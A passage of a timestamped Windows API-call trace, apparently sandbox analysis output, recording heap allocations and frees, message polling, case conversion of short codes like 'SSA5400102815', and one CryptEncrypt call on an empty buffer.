lpMsg=0x8bf3c0) returned 0 [0208.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0208.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0208.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0208.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0208.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.360] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0208.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.360] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0208.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.360] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0208.360] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.360] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0208.360] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.360] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0208.361] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0208.361] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0208.361] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0208.361] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.361] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0208.361] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.362] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.362] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0208.362] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0208.362] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0208.362] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.362] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0208.362] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.363] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0208.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0208.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0208.363] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.363] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0208.364] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.364] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.364] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0208.364] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0208.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0208.365] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0208.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0208.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0208.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0208.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0208.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0208.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0208.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0208.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0208.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0208.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0208.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0208.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0208.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0208.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0208.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0208.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0208.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0208.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0208.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0208.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0208.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0208.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0208.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0208.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0208.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0208.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0208.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0208.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0208.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0208.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0208.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0208.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0208.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0208.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0208.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0208.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0208.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0208.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0208.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0208.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0208.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0208.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0208.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0208.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0208.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0208.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0208.370] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0208.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0208.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0208.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0208.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0208.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0208.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0208.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0208.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0208.371] HeapFree (in: hHeap=0x25c0000, 